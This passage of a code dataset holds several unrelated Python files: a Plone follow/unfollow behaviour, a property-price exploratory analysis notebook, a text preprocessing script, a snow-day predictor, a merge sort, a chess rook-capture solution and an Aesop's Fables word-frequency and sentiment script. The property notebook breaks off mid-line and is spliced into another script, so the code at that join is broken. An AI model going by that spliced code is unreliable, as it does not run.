emc.kb.portlets import relatedinformation\nfrom plone.uuid.interfaces import IUUID\n\n\n\nfrom emc.kb import _\n\nFOLLOWED_KEY = 'emc.kb.follow'\n\n@implementer(IFollowing)\n@adapter(IDexterityContent)\nclass Follow(object):\n# grok.provides(IFollowing)\n# grok.context(Itopic)\n \n def __init__(self, context):\n self.context = context\n \n annotations = IAnnotations(context)\n if FOLLOWED_KEY not in annotations.keys():\n annotations[FOLLOWED_KEY] = PersistentList() \n self.followed = annotations[FOLLOWED_KEY]\n \n #Statistics concern the number of\n @property\n def followerNum(self):\n total = len(self.followed)\n return total\n \n #Determine whether to be concerned about\n def available(self, userToken):\n return not(userToken in self.followed)\n# return self.followed.has_key(userToken) \n #Editing statistics concern the number of \n def addFollow(self, userToken):\n if self.available(userToken):\n self.followed.append(userToken)\n else:\n raise KeyError(\"The %s is concerned about\" % userToken)\n #Editing statistics concern the number of \n def delFollow(self, userToken):\n if not self.available(userToken):\n self.followed.remove(userToken)\n else:\n raise KeyError(\"The %s is not concerned about\" % userToken)\n\n@grok.subscribe(IFollowable,IFollowedEvent)\ndef SubscriberFollowed(obj,event):\n mp = getToolByName(obj,'portal_membership')\n# import pdb\n# pdb.set_trace()\n userobject = mp.getAuthenticatedMember()\n username = userobject.getId()\n fwqlist = list(userobject.getProperty('myfollowquestion'))\n fwtlist = list(userobject.getProperty('myfollowtopic'))\n fwlist = list(userobject.getProperty('myfollow'))\n\n \n uuid = IUUID(obj,None)\n if uuid == None:return\n if not (uuid in fwlist):\n fwlist.append(uuid) \n userobject.setProperties(myfollow=fwlist)\n \n if Iquestion.providedBy(obj) and not(uuid in fwqlist):\n fwqlist.append(uuid) \n userobject.setProperties(myfollowquestion=fwqlist) \n if Itopic.providedBy(obj) and not(uuid in fwtlist):\n fwtlist.append(uuid) \n userobject.setProperties(myfollowtopic=fwtlist) \n \n evlute = IFollowing(obj) \n if evlute.available(username):\n evlute.addFollow(username)\n obj.followernum = evlute.followerNum\n obj.reindexObject() \n \n@grok.subscribe(IFollowable,IUnFollowedEvent)\ndef SubscriberUnFollowed(obj,event):\n mp = getToolByName(obj,'portal_membership')\n userobject = mp.getAuthenticatedMember()\n username = userobject.getId()\n fwqlist = list(userobject.getProperty('myfollowquestion'))\n fwtlist = list(userobject.getProperty('myfollowtopic')) \n fwlist = list(userobject.getProperty('myfollow'))\n\n uuid = IUUID(obj,None)\n if uuid == None:return\n if (uuid in fwlist):\n fwlist.remove(uuid)\n userobject.setProperties(myfollow=fwlist)\n if Iquestion.providedBy(obj) and (uuid in fwqlist):\n fwqlist.remove(uuid) \n userobject.setProperties(myfollowquestion=fwqlist) \n if Itopic.providedBy(obj) and (uuid in fwtlist):\n fwtlist.remove(uuid) \n userobject.setProperties(myfollowtopic=fwtlist) \n \n evlute = IFollowing(obj) \n if not evlute.available(username):\n evlute.delFollow(username)\n obj.followernum = evlute.followerNum\n obj.reindexObject() \n\n@grok.subscribe(IFollowable, IObjectRemovedEvent)\ndef delFollow(obj,event):\n followevlute = IFollowing(obj)\n fwlist = followevlute.followed\n if len(fwlist) == 0:\n return\n \n pm = getToolByName(obj, 'portal_membership')\n for userid in fwlist:\n userobject=pm.getMemberById(userid)\n fwqlist = list(userobject.getProperty('myfollowquestion'))\n fwtlist = 
list(userobject.getProperty('myfollowtopic'))\n        fwlist = list(userobject.getProperty('myfollow'))\n#        userfollow = list(userobject.getProperty('myfollow'))\n        uuid = IUUID(obj, None)\n        if uuid in fwlist:\n            fwlist.remove(uuid)\n            userobject.setProperties(myfollow=fwlist)\n        if uuid in fwtlist:\n            fwtlist.remove(uuid)\n            userobject.setProperties(myfollowtopic=fwtlist)\n        if uuid in fwqlist:\n            fwqlist.remove(uuid)\n            userobject.setProperties(myfollowquestion=fwqlist)\n\n@grok.subscribe(Itopic, ICountNumEvent)\ndef CountNum(obj, event):\n    num = obj.visitnum\n    visitnum = num + 1\n    obj.visitnum = visitnum\n\n@grok.subscribe(Itopic, IObjectAddedEvent)\ndef AddTopicPortlet(obj, event):\n    \"\"\" this will add the relatedinformation portlet to a topic automatically.\"\"\"\n\n    parent = aq_parent(obj)\n    if Itopic.providedBy(parent):\n        return\n\n    # A portlet manager is akin to a column\n    column = getUtility(IPortletManager, name=PROMOTIONS_PORTLET_COLUMN)\n\n    # We multi-adapt the object and the column to an assignment mapping,\n    # which acts like a dict where we can put portlet assignments\n    manager = getMultiAdapter((obj, column,), IPortletAssignmentMapping)\n\n    # We then create the assignment and put it in the assignment manager,\n    # using the default name-chooser to pick a suitable name for us.\n    assignment = relatedinformation.Assignment()\n    chooser = INameChooser(manager)\n    manager[chooser.chooseName(None, assignment)] = assignment\n","sub_path":"emc/kb/behaviors/follow.py","file_name":"follow.py","file_ext":"py","file_size_in_byte":6958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"296617587","text":"# -*- coding: utf-8 -*-\n\n#%% md\n# Exploratory Data Analysis\n\n# Property Sale Prices\n\n\n#%%\nimport pandas as pd\nimport os\nfrom pathlib import Path\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport quickda\n\npd.options.display.max_rows = 999\npd.options.display.max_columns = 999\n\nimport seaborn as sns\n\n\n#import warnings\n#warnings.filterwarnings('ignore')\n\n#%%\n# Set fixed parameters\n\nSEED = 1234  # Seed for random number generators\n\n#%% md\n### Load data\n\n\n#%%\n\n\n#ROOT_PATH = os.path.abspath(os.path.dirname(__file__))\ndata_folder = '../../data/raw/'\n\ndsets = {}\n\nfilenames = [\n    #'dvf_2018.gz',\n    'dvf_2019.gz'\n]\n\n#%%\n# Utility function to read the original raw data files and write out a data sample\ndef pd_read_save(filename, sample_size, output_path):\n    # n = sum(1 for line in open(filename, errors = \"ignore\")) - 1  # number of records in file (excludes header)\n    # print(\"total rows\")\n    # s = sample_size  # desired sample size\n    # skip = sorted(np.random.random_integers(1, n+1, n-s))  # the 0-indexed header will not be included in the skip list\n    df = pd.read_csv(filename, error_bad_lines = False)  # , skiprows=skip\n    df_sample = df.sample(sample_size, random_state = SEED)\n    df_sample.to_csv(output_path, sep = \";\", index = False)\n    print('Writing file of shape: ', df_sample.shape)\n    return df\n\n\n\n#%%\n# Read saved data samples\nuse_samples = False\n\nfor f in filenames:\n    base_name = f.split('.')[0]\n    if not use_samples:\n        data_path = data_folder + f\n        print(data_folder + 'samples/' + f.split('.')[0] + '_sample.csv.gz')\n        dsets[base_name] = pd_read_save(data_path, sample_size=400000,\n                                        output_path=data_folder + 'samples/' + f.split('.')[0] + '_sample.csv.gz')\n    else:\n        dsets[base_name] = pd.read_csv(data_folder + 'samples/' + base_name + '_sample.csv.gz',\n                                       error_bad_lines = False, sep = ';')\n
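\n# Illustrative sanity check (an added sketch, not part of the original notebook):\n# dsets now maps base names like 'dvf_2019' to DataFrames.\nassert all(isinstance(v, pd.DataFrame) for v in dsets.values())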
\n\n\ndsets.keys()\n\n\n#%% md \n#### Merge the Data Sets \n\n\n#%%\n# Merge the data sets\n\ndata_in = pd.concat([dsets[d] for d in dsets.keys()])\nprint(data_in.shape) \nprint(data_in.tail(2).T)\n\n# Initial pre Analysis showed that there are many duplicated rows.\ndata_in.drop_duplicates(inplace=True)\nprint(data_in.shape) \n\n# =============================================================================\n#%% md \n#### Explore Data \n\n#%%\n\ndata_in.info()\n\n#%%\n# Get Proportion of Null values on Columns\n\n#nulls_df = pd.DataFrame( {'Nulls': data_in.isnull().sum().values\n# , 'Ptj':data_in.isnull().sum() / data_in.shape[0]\n# }\n# )\n#print(nulls_df)\n\n\n# =============================================================================\n#%% md \n### Data Summary\n#Summary of the Row Data Set \n\n#%%\nfrom quickda.explore_data import *\nfrom quickda.clean_data import *\nfrom quickda.explore_numeric import *\nfrom quickda.explore_categoric import *\nfrom quickda.explore_numeric_categoric import *\nfrom quickda.explore_time_series import *\n\n\nsummary = explore(data_in, method=\"summarize\")\n#%%\n\nsummary # Display Raw Data Summary\n\n#summary\n\n#%% md \n### Assign Features on Categories\n\n\n#%%\n#%md Useful FtrsDrop Reason: They can not have missing values\n#valeur_fonciere (target cant have nulls)\n\n\n#%md High null pct ftrs\n\n#adresse_suffixe 0.958\n#ancien_code_commune 0.991\n#ancien_id_parcelle 0.999\n#ancien_nom_commune 0.991\n#code_nature_culture_speciale 0.954\n#code_type_local 0.476\n#lot1_numero 0.687\n#lot1_surface_carrez 0.912\n#lot2_numero 0.935\n#lot2_surface_carrez 0.979\n#lot3_numero 0.989\n#lot3_surface_carrez 0.998\n#lot4_numero 0.996\n#lot4_surface_carrez 0.999\n#lot5_numero 0.998\n#lot5_surface_carrez 1.000\n#nature_culture_speciale 0.954\n#numero_volume 0.997\n\n\n#%md Useful FtrsRedundant Features\n# dtypes count null_sum null_pct nunique\n#ancien_code_commune float64 7004 778519 0.991 532 \n#code_commune object 785523 0 0.000 31251 \n#code_departement object 785523 0 0.000 97 \n#code_nature_culture object 535959 249564 0.318 27 \n#code_nature_culture_speciale object 35761 749762 0.954 113 \n#code_type_local float64 411728 373795 0.476 4 \n\n\n#%md Useful Ftrs\n#surface_reelle_bati 118074 0.590370 NaN 0\n#nombre_pieces_principales 93279 0.466395 NaN 0\n#nature_culture 62293 0.311465 NaN \"N/A\"\n#code_type_local NAN \"N/A\"\n#longitude 4048 0.020240 k-neighb estim\n#latitude 4048 0.020240 k-neighb estim\n\n\n\n\n#%% md \n### Setting Unuseful featues for analysis Using above summary results\n\n\n\n#%% # Assigning Features to differet categorie types\n\nunuseful_ftrs = ['id_mutation', 'adresse_nom_voie', 'adresse_numero']\n\nuseful_high_ptc_ftrs = [ 'adresse_numero'\n , 'nombre_pieces_principales'\n , 'type_local'\n , 'surface_reelle_bati' \n , 'type_local'\n ]\n\n#Un inputable high nulls ftrs\nftrs_high_null_ptc = [f for f in summary.loc[summary.null_pct > 0.40,:].index if f not in useful_high_ptc_ftrs]\n#summary.loc[ftrs_high_null_ptc, 'null_pct']\n\nuseful_code_ftrs = [\n 'code_commune'\n , 'code_postal'\n ]\n\nredundant_ftrs = [c for c in summary.index if 'code' in c and c not in useful_code_ftrs]\nredundant_ftrs\n\n\nunuseful_ftrs += sorted(list(set(ftrs_high_null_ptc).union(set(redundant_ftrs))))\nunuseful_ftrs\n\n\nftrs = list(sorted([f for f in data_in.columns if f not in unuseful_ftrs])) \n\n\n\n#%%\n# Inspect left useful ftrs\nsmmry4 = ['dtypes', 'count', 'null_pct', 'nunique']\nsummary.loc[ftrs, smmry4]\n\n\n\n\n\n#%% md \n### Set useful Feature 
Groups\n\n\n#%%\n# Set useful Feature Groups\n\nftrs = list(sorted([f for f in data_in.columns if f not in unuseful_ftrs]))\ntarget = 'valeur_fonciere'\nftrs.remove(target)\n\nnum_ftrs = list(summary.loc[summary.index.isin(ftrs) & (summary['dtypes'] != 'object'),:].index)\nnum_ftrs = [f for f in num_ftrs if f not in ['code_postal']] # Remove wrogly assigned num ftrs and target\ndata_in.loc[:,'code_postal'] = data_in.loc[:,'code_postal'].astype('str')\n\nsummary.loc[num_ftrs,smmry4]\n\ndate_ftrs = ['date_mutation']\n\ncat_ftrs = list(summary.loc[summary.index.isin(ftrs)\n & (summary['dtypes'] == 'object')\n & (summary['nunique'] > 2 )\n ,:].index\n )\ncat_ftrs.append('code_postal')\nbool_ftrs = []\n\n# Assert all columns have bee assigned to a ftr class\nall_solumns_assigned = len(set(data_in.columns).symmetric_difference(\n set(unuseful_ftrs + num_ftrs + cat_ftrs + date_ftrs + bool_ftrs + [target])))==0\nassert(all_solumns_assigned)\n\n\ndata_in2 = data_in.loc[:, [target] + ftrs ]\n\n\nfor dt in [date_ftrs, num_ftrs, cat_ftrs]:\n print(summary.loc[dt, smmry4])\n\ndata_in2.tail(1).T\n\n\n#%% md \n##### Check Duplicates\n\n\n\n#%% md #\n#It seems like duplicates are sales with id_parcelle ad num disposition\n#and valeur_fonciere when they are same more than once \n\n\n#%%\n# Explore number of duplicated id parcells, This, inf fact should be a dropped field\nby_id_parcells = data_in.groupby('id_parcelle')\n#by_id_parcells.agg({'id_mutation': 'count'}).id_mutation.value_counts()#.plot.bar() #head()\nby_parcell_mutations = by_id_parcells.agg({'id_mutation': 'count'}).reset_index()\n# print(by_parcell_mutations.head())\n\nnuni_ue_mutations_parcels = by_parcell_mutations.loc[\n by_parcell_mutations.id_mutation>1,'id_parcelle'] #filter parcels wit 2 or more mutations\n\nnuni_ue = (data_in.loc[data_in.id_parcelle.isin(nuni_ue_mutations_parcels.values),:]\n .sort_values(by=['id_parcelle']\n )\n )\nnuni_ue.tail(4).T\n\n\n\n#%% \n\n# Drop duplicate properties\nid_ftrs = ['id_parcelle'\n , 'valeur_fonciere'\n ]\ndata_unique = data_in2.drop_duplicates(subset=id_ftrs, keep='last')\n\n\n#%% \ndata_unique.type_local.value_counts()\n\n#%% \n\n# Select only Sell operations\n\ndata = data_unique.loc[ (data_unique.nature_mutation == 'Vente')\n & (data_unique.type_local.isin(['Appartement', 'Maison']))\n ,:]\ndata.shape\n\n\n\n#%% \n# Update usable ftrs categories Nature mutation will be a not usable ftrs\ncat_ftrs.remove('nature_mutation')\nftrs.remove('nature_mutation')\nunuseful_ftrs.append('nature_mutation')\ncat_ftrs.remove('nom_commune')\nftrs.remove('nom_commune')\nunuseful_ftrs.append('nom_commune')\n\n\n#%%\nftrs\n#%%md \n### Explore Target Feature\n###### First Plotting target_value in thousands to facilitate visualization\n\n\n#%%md \n###### Original target values are very left skewed\n\n#%%\n###### Add sale value in thousands for easiest management\n###### Now plot log of target value\ndf_plot = data.sample(10000, random_state=SEED)\n\nfig, ax = plt.subplots(figsize=(12,8))\n(df_plot.valeur_fonciere/1000).plot.hist(ax = ax, bins = 10)\n#sns.histplot(df_plot.valeur_fonciere/1000, ax=ax, kde=False)\nplt.show()\n\n\n\n#%% md\n#Applying log transformations gives a very centered distribution, There is, however a small separated group of very low valuew which can, maybe be inspected to see if they are outliers.\n\n\n#%%\ndata.numero_disposition\n#%%\n# Now plot log of skewed ftrs\n\nfor f in ['valeur_fonciere', 'surface_reelle_bati', 'surface_terrain']:\n df_plot = data.sample(10000, random_state=SEED) \n 
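    # log1p(x) = log(1 + x): it is defined at x = 0 and compresses the long right tail,\n    # which is why it is applied to these skewed features below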
fig, ax = plt.subplots(figsize=(12,8))\n sns.histplot(np.log1p(df_plot[f].values), ax=ax, kde=True)\n plt.show()\n\n\n\n#%%\n# We add the scaled target value to use\n\ndata['valeur_fonciere_log'] = np.log1p(data['valeur_fonciere'])\n\n# Now plot log of target value\ndf_plot = data.sample(10000, random_state=SEED)\n\nfig, ax = plt.subplots(figsize=(12,8))\nsns.histplot(np.log1p(df_plot.valeur_fonciere_log.values), ax=ax, kde=True)\nplt.show()\n\n#%% md\n#Potentian outlier vals are sell values under 90 and are approx 1% of data\n\n#%%\n\noutlier_thr = np.expm1(4.5)\nprint('Outlier threshold:', outlier_thr)\nprint( data.loc[data['valeur_fonciere_log']<4.5,:].shape\n , data.loc[data['valeur_fonciere'] 0:\n\t\t\t\t\tbreak\n\t\t\tcleaned_venue = ' '.join(cleaned_venue_tokens)\n\t\t\toutputfile.write('#c' + cleaned_venue + '\\n')\n\n\t\t\tyear = re.search(r'(?<=#t ).+', paper).group()\n\t\t\toutputfile.write('#t' + year + '\\n')\n\n\t\t\tabstract = re.search(r'(?<=#! ).+', paper).group()\n\t\t\tabstract = abstract.lower()\n\t\t\tabstract = abstract.translate(remove_digits)\n\t\t\tabstract_tokens = word_tokenize(abstract)\n\t\t\tcleaned_abs_list = []\n\t\t\tfor each in abstract_tokens:\n\t\t\t\tif each not in pw and each not in string.punctuation:\n\t\t\t\t\tcleaned_abs_list.append(each)\n\t\t\tcleaned_abstract = ' '.join(cleaned_abs_list)\n\t\t\toutputfile.write('#!' + cleaned_abstract + '\\n')\n\n\t\t\toutputfile.write('\\n')\n\n\t\toutputfile.close()","sub_path":"scripts/preprocess_topic.py","file_name":"preprocess_topic.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"565776019","text":"import sys\n\n#count the arguments\n#starts at 1\narguments = len(sys.argv) - 1\n\n\nclass Predict:\n def __init__(self, temp, rf, snow, time):\n self.temp = temp\n self.rf = rf\n self.snow = snow\n self.time = time\n\n def closed(self):\n if self.temp <= 31 and self.snow > 2 and self.time > 180:\n print(\"Snow day likely\")\n \n else:\n print(\"Not closing, potenital delayed opening\")\n\n\nprediction = Predict(int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3]), int(sys.argv[4]))\nprediction.closed()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"13414118","text":"\"\"\"\n MergeSort.py 归并排序\n\"\"\"\n\n\ndef merge_sort(_list):\n if len(_list) <= 1:\n return _list\n _mid = len(_list) // 2\n left_list = merge_sort(_list[:_mid])\n right_list = merge_sort(_list[_mid:])\n result = []\n if left_list and right_list:\n while len(left_list) > 0 and len(right_list) > 0:\n result.append(left_list.pop(0)) if left_list[0] <= right_list[0] else result.append(right_list.pop(0))\n result += left_list\n result += right_list\n return result\n\n\nif __name__ == '__main__':\n _l = [1, 2, 3, 4, 222, 3, 4, 6, 99]\n print(merge_sort(_l))\n","sub_path":"MiniModel/Sort/MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"117067855","text":"# On an 8 x 8 chessboard, there is one white rook. There also may be empty squares, white bishops, and black pawns. These are given as characters 'R', '.', 'B', and 'p' respectively. 
Uppercase characters represent white pieces, and lowercase characters represent black pieces.\n\n# The rook moves as in the rules of Chess: it chooses one of four cardinal directions (north, east, west, and south), then moves in that direction until it chooses to stop, reaches the edge of the board, or captures an opposite colored pawn by moving to the same square it occupies. Also, rooks cannot move into the same square as other friendly bishops.\n\n# Return the number of pawns the rook can capture in one move.\n\n \n\n# Example 1:\n\n\n\n# Input: [[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"p\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"R\",\".\",\".\",\".\",\"p\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"p\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"]]\n# Output: 3\n# Explanation: \n# In this example the rook is able to capture all the pawns.\n# Example 2:\n\n\n\n# Input: [[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\"p\",\"p\",\"p\",\"p\",\"p\",\".\",\".\"],[\".\",\"p\",\"p\",\"B\",\"p\",\"p\",\".\",\".\"],[\".\",\"p\",\"B\",\"R\",\"B\",\"p\",\".\",\".\"],[\".\",\"p\",\"p\",\"B\",\"p\",\"p\",\".\",\".\"],[\".\",\"p\",\"p\",\"p\",\"p\",\"p\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"]]\n# Output: 0\n# Explanation: \n# Bishops are blocking the rook to capture any pawn.\n# Example 3:\n\n\n\n# Input: [[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"p\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"p\",\".\",\".\",\".\",\".\"],[\"p\",\"p\",\".\",\"R\",\".\",\"p\",\"B\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"B\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\"p\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\",\".\",\".\",\".\"]]\n# Output: 3\n# Explanation: \n# The rook can capture the pawns at positions b5, d6 and f5.\n \n\n# Note:\n\n# board.length == board[i].length == 8\n# board[i][j] is either 'R', '.', 'B', or 'p'\n# There is exactly one cell with board[i][j] == 'R'\nclass Solution:\n def numRookCaptures(self, board) -> int:\n for i in range(8):\n flag=False\n for j in range(8):\n if board[i][j] == \"R\":\n flag=True\n break\n if flag:\n break\n ni = i + 1\n ans = 0\n while ni < 8:\n if board[ni][j] == \".\":\n ni += 1\n elif board[ni][j] == \"B\":\n break\n else:\n ans += 1\n break\n ni = i - 1\n while ni >= 0:\n if board[ni][j] == \".\":\n ni -= 1\n elif board[ni][j] == \"B\":\n break\n else:\n ans += 1\n break\n nj = j + 1\n while nj < 8:\n if board[i][nj] == \".\":\n nj += 1\n elif board[i][nj] == \"B\":\n break\n else:\n ans += 1\n break\n nj = j - 1\n while nj >= 0:\n if board[i][nj] == \".\":\n nj -= 1\n elif board[i][nj] == \"B\":\n break\n else:\n ans += 1\n break\n return ans","sub_path":"999_Available_Captures_For_Rook.py","file_name":"999_Available_Captures_For_Rook.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"608865091","text":"import urllib.request\nimport string\nimport os\nfrom nltk.corpus import stopwords\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nimport math\n\nurl = 'http://www.gutenberg.org/cache/epub/28/pg28.txt'\nresponse = urllib.request.urlopen(url)\ndata = response.read() # a `bytes` object\ntext = 
data.decode('utf-8')\n# os.chdir(r\"c:\\Users\\gdevina1\\Documents\\GitHub\\text_mining\")\n# cwd = os.getcwd()\n# print(cwd)\n#print(text) # for testing\n\ndef process_online_text(text, skip_header):\n \"\"\"\n Makes a histogram that contains the words from a gutenberg online source file.\n\n filename: string\n skip_header: boolean, whether to skip the Gutenberg header\n \n returns: map from each word to the number of times it appears.\n \"\"\"\n hist = {}\n\n if skip_header:\n text = skip_gutenberg_start_end(text)\n\n text = text.split()\n # text = map(toLowerCase,text)\n\n for i in text:\n i = i.replace('-', ' ')\n strippables = string.punctuation + string.whitespace\n\n for word in i.split():\n # remove punctuation and convert to lowercase\n word = word.strip(strippables)\n word = word.lower()\n\n # update the histogram\n hist[word] = hist.get(word, 0) + 1\n\n return hist\n\ndef process_file(filename, skip_header):\n \"\"\"Makes a histogram that contains the words from a local file.\n\n filename: string\n skip_header: boolean, whether to skip the Gutenberg header\n\n returns: map from each word to the number of times it appears.\n \"\"\"\n hist = {}\n fp = open(filename, encoding='utf8')\n\n if skip_header:\n skip_gutenberg_header(fp)\n\n for line in fp:\n strippables = string.punctuation + string.whitespace\n\n for word in line.split():\n # remove punctuation and convert to lowercase\n word = word.strip(strippables)\n word = word.lower()\n\n # update the histogram\n hist[word] = hist.get(word, 0) + 1\n\n return hist\n\ndef skip_gutenberg_start_end(text):\n \"\"\"\n Reads from text until it finds the line that ends the header.\n\n text: open file object\n\n returns: remaining text starting from 'start' and ends with 'end'\n \"\"\"\n start = \"The Man, the Boy, and the Donkey The Fox and the Goat\"\n i = text.find(start)\n end = \"End of the Project Gutenberg EBook of Aesop's Fables, by Aesop\"\n x = text.find(end)\n\n return text[i+(len(start)):x]\n\ndef extract_fable(text,start,end):\n \"\"\"\n Reads from text until it finds the line that ends the header.\n\n text: open file object\n start: string in text\n end: string in text\n\n returns: remaining text starting from 'start' and ends with 'end'\n \"\"\"\n i = text.find(start)\n x = text.find(end)\n\n return text[i+(len(start)):x+(len(end))]\n\ndef compare(hist,animals):\n \"\"\"\n Finds matches of keys in hist and keys in animals, iterates while counting frequency of word appearance.\n\n hist = map from word to frequency\n animals = text file of list of animals\n\n returns = list of frequency,word pairs\n \"\"\"\n match = {}\n for key in animals:\n if key in hist:\n match[key] = hist.get(key, 0)\n return match\n\ndef no_stop_words(hist, key):\n \"\"\"\n Deletes stop words from dictionary\n\n hist = map from word to frequency\n key = elements to delete\n\n returns = list of frequency,word pairs\n \"\"\"\n hist2 = hist.copy()\n for i in key:\n if i in hist2:\n del hist2[i]\n return hist2\n\ndef sentiment_analysis(text):\n score = SentimentIntensityAnalyzer().polarity_scores(text)\n #return the polarity score of the text\n return score\n\ndef most_common(hist):\n \"\"\"Makes a list of word-freq pairs in descending order of frequency.\n\n hist: map from word to frequency\n\n returns: list of (frequency, word) pairs\n \"\"\"\n t = []\n # remove word from filtered_word_list if it is a stop word\n for key, value in hist.items():\n t.append((value, key))\n t.sort()\n t.reverse()\n return t\n\ndef most_common_all(hist):\n \"\"\"\n Prints a 
list of word-freq pairs in descending order of frequency.\n\n    hist: map from word to frequency\n\n    prints: list of (frequency, word) pairs\n    \"\"\"\n    t = []\n    for key, value in hist.items():\n        t.append((value, key))\n    t.sort()\n    t.reverse()\n\n    for value, key in t:\n        print(\"{:14}{}\".format(key, value))\n\n\ndef most_common_limited(hist, num=10):\n    \"\"\"\n    Prints the most common words in a histogram and their frequencies.\n\n    hist: histogram (map from word to frequency)\n    num: number of words to print\n    \"\"\"\n    t = most_common(hist)\n    for freq, word in t[:num]:\n        print(\"{:14}{}\".format(word, freq))\n\ndef total_words(hist):\n    \"\"\"\n    Returns the total of the frequencies in a histogram.\n    \"\"\"\n    return sum(hist.values())\n\ndef numerator(fable_one, fable_two):\n    \"\"\"\n    Calculates the dot product of two word-frequency histograms,\n    i.e. the numerator of the cosine-similarity formula.\n\n    fable_one: histogram\n    fable_two: histogram\n\n    returns: number\n    \"\"\"\n    num = 0\n    for word in fable_one:\n        if word in fable_two:\n            num += fable_one[word]*fable_two[word]\n    return num\n\ndef cosine_similarity(fable_one, fable_two):\n    \"\"\"\n    Calculates the angle (in radians) between two texts (histograms);\n    0 means the word-frequency vectors point in the same direction.\n\n    fable_one: histogram\n    fable_two: histogram\n\n    returns: number\n    \"\"\"\n    num = numerator(fable_one, fable_two)\n    denom = math.sqrt(numerator(fable_one, fable_one)*numerator(fable_two, fable_two))\n    return math.acos(num/denom)\n\ndef main():\n    hist = process_online_text(text, True)\n    animals = list(process_file('animals.txt', False).keys())\n    animals.remove(animals[0])\n    # print(animals)\n    # print(compare(hist, animals))\n    hist2 = hist.copy()\n    # print(hist2)\n    # print(no_stop_words(hist2))\n    # most_common(hist)\n    # print(no_stop_words(hist2, stop_words))\n    stop_words = stopwords.words('english')\n    print(\"\")\n    print(\"The most common words in the text (without stop words) are:\")\n    most_common_limited(no_stop_words(hist2, stop_words))\n    print(\"\")\n    print(\"------------------------------------------------------------\")\n    print(\"\")\n    print(\"List of all the animals appearing in Aesop's Fables\")\n    most_common_all(compare(hist, animals))\n    print(\"\")\n    print(\"Total number of animals appearing in text: \", total_words(compare(hist, animals)))\n    print(\"------------------------------------------------------------\")\n    print(\"\")\n    print(\"Total number of words in Aesop's Fables collection: \", total_words(hist))\n    print(\"Percentage of total words in text that are animals: {0:.2f}%\".format(total_words(compare(hist, animals))/total_words(hist)*100))\n    print(\"\")\n    print(\"------------------------------------------------------------\")\n    tabcon = extract_fable(text, start=\"1-21 22-42\", end=\"The Fox and the Goat\")\n    tableofcontents = process_online_text(tabcon, False)\n    # print(tableofcontents)\n    print(\"\")\n    print(\"The 5 most common animals in the Aesop's Fables' titles:\")\n    most_common_limited(compare(tableofcontents, animals), num=5)\n    print(\"\")\n    print(\"------------------------------------------------------------\")\n    print(\"\")\n    print(\"The 5 most common animals in the entire text:\")\n    most_common_limited(compare(hist, animals), num=5)\n    print(\"\")\n    print(\"------------------------------------------------------------\")\n    hare_and_tortoise = extract_fable(text, start=\"It is easy to propose impossible remedies.\", end=\"Plodding wins the race.\")\n    hist_hare_and_tortoise = process_online_text(hare_and_tortoise, False)\n    wolf_sheep_clothing = extract_fable(text, start=\"you cannot reckon.\", end=\"Appearances are deceptive.\")\n
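    # cosine_similarity() returns the angle in radians between the two word-frequency\n    # vectors: 0 means identical direction, pi/2 means the texts share no words.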
    hist_wolf_sheep_clothing = process_online_text(wolf_sheep_clothing, False)\n    fox_and_grapes = extract_fable(text, start=\"Nothing escapes the master's eye.\", end=\"It is easy to despise what you cannot get.\")\n    hist_fox_and_grapes = process_online_text(fox_and_grapes, False)\n    print(\"\")\n    print(\"Sentiment analysis results of The Hare and The Tortoise:\")\n    print(sentiment_analysis(hare_and_tortoise))\n    print(\"\")\n    print(\"Sentiment analysis results of The Wolf in Sheep's Clothing\")\n    print(sentiment_analysis(wolf_sheep_clothing))\n    print(\"\")\n    print(\"Sentiment analysis results of The Fox and the Grapes\")\n    print(sentiment_analysis(fox_and_grapes))\n    print(\"\")\n    print(\"------------------------------------------------------------\")\n    print(\"\")\n    print(\"The Hare and The Tortoise and The Wolf in Sheep's Clothing is {:.2f}% similar.\".format((1 - cosine_similarity(hist_hare_and_tortoise, hist_wolf_sheep_clothing)/(math.pi/2))*100))\n    print(\"\")\n    print(\"The Hare and The Tortoise and The Fox and the Grapes is {:.2f}% similar.\".format((1 - cosine_similarity(hist_hare_and_tortoise, hist_fox_and_grapes)/(math.pi/2))*100))\n    print(\"\")\n    print(\"The Fox and the Grapes and The Wolf in Sheep's Clothing is {:.2f}% similar.\".format((1 - cosine_similarity(hist_wolf_sheep_clothing, hist_fox_and_grapes)/(math.pi/2))*100))\n    print(\"\")\n    print(\"------------------------------------------------------------\")\n    print(\"END OF ANALYSIS\")\n    print(\"------------------------------------------------------------\")\n\n\nif __name__ == '__main__':\n    main()","sub_path":"assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":9305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
